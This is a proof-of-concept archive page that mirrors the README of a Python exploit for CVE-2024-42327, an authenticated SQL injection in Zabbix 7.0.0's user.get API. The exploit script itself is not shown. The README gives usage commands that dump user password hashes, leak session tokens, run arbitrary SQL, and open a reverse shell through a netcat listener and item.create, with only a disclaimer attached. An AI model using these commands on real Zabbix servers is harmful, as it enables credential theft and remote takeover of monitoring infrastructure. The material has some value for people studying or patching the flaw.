Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1000 CNY

100.0%
Buy Us a Coffee

CVE-2024-42327 PoC — SQL injection in user.get API

Source
https://github.com/874anthony/CVE-2024-42327_Zabbix_SQLi
Associated Vulnerability
Title:SQL injection in user.get API (CVE-2024-42327)
Description:A non-admin user account on the Zabbix frontend with the default User role, or with any other role that gives API access can exploit this vulnerability. An SQLi exists in the CUser class in the addRelatedObjects function, this function is being called from the CUser.get function which is available for every user who has API access.
Description
This is for educational porpuses only. Please do not use agains unathorized systems.
Readme
# 🛡️ Zabbix 7.0.0 SQL Injection Exploit Script

A Python script to exploit a **Zabbix 7.0.0** authenticated SQL injection vulnerability, supporting multiple modes of action including user data extraction, session token leaks, remote command execution (RCE), and custom query injection.

> ⚠️ **DISCLAIMER:**  
> This script is for **educational** and **authorized penetration testing** purposes only.  
> Do **not** use it on systems you do not own or have explicit permission to test.  
> The author is not responsible for any misuse or damage caused by this tool.

---

## ✨ Features

- ✅ Authenticated SQL Injection against Zabbix 7.0.0
- 🧑‍💻 Dump user hashes from the DB
- 🔐 Leak session tokens
- 🐚 Remote code execution via reverse shell (admin token required)
- 🧠 Run custom SQL queries

---

## 🔧 Requirements

- Python 3.6+
- `requests` library

Install requirements if needed:

```bash
pip install requests
```

## 🚀 Usage

```bash
python3 sqliZabbix.py -u <ZABBIX_URL> -U <USERNAME> -p <PASSWORD> --mode <MODE> [optional args...]
```


## 🔘 Available Modes

| Mode	| Description | Requires Admin Token |
| ------------ | ------------ | ------------ |
| leak-users |	Dumps all user IDs, usernames, password hashes, and roles |	❌ |
| leak-tokens | Dumps all active session IDs from the database | ❌ |
| rce | Spawns a reverse shell via item.create exploit |  ✅ |
| custom | Run any custom SQL query via the injection | ❌ |		


## 🧪 Examples
Dump User Hashes

```bash
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-users
```

Leak Session Tokens

```bash
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode leak-tokens
```

Remote Code Execution (Reverse Shell)

```bash
# Start a listener first:
nc -lvnp 9001

# Then run:
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --admin_token <ADMIN_API_TOKEN> --ip <YOUR_IP> --port 9001 --mode rce
```

Custom SQL Injection

```bash
python3 sqliZabbix.py -u http://target/zabbix/ -U guest -p guest --mode custom --query "SELECT version()"
```

## 📁 Project Structure

```bash
sqliZabbix.py      # Main exploit script
README.md          # This documentation
```
## 🧑‍💻 Author

Anthony (@874anthony)

Crafted with love & curiosity 🐍

## 🔐 License
This project is released under the MIT License. Please use responsibly.
File Snapshot

 [4.0K]  /data/pocs/8d773782fe4c9b62ec1446a853ff598423627407
├── [2.3K]  README.md
└── [8.6K]  sqliZabbix.py

0 directories, 2 files
Shenlong Bot has cached this for you
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →